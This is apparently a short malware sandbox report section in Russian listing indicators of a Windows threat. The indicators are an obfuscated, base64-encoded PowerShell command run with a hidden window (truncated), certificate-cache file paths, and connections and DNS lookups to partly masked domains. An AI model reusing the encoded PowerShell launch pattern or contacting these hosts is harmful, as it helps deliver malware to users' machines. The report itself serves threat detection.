Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AG8AZAB0AGgAZQBhAHcAPQAnAG0AYQBpAGcAbQBvAGoAYwBvAG8AYwBwAG8AbwB3AHYAaQBlAGMAdABoAGEAbwByACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAQwB1AF...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'in###ertec.com':443
- 'la#####traction.work':443
- 'kd###umy.com':443
- 'lw##y.com':443
- DNS ASK kd###umy.com
- DNS ASK lw##y.com
- DNS ASK in###ertec.com
- DNS ASK la#####traction.work
- DNS ASK bi###he.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AG8AZAB0AGgAZQBhAHcAPQAnAG0AYQBpAGcAbQBvAGoAYwBvAG8AYwBwAG8AbwB3AHYAaQBlAGMAdABoAGEAbwByACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAQwB1AF...' (со скрытым окном)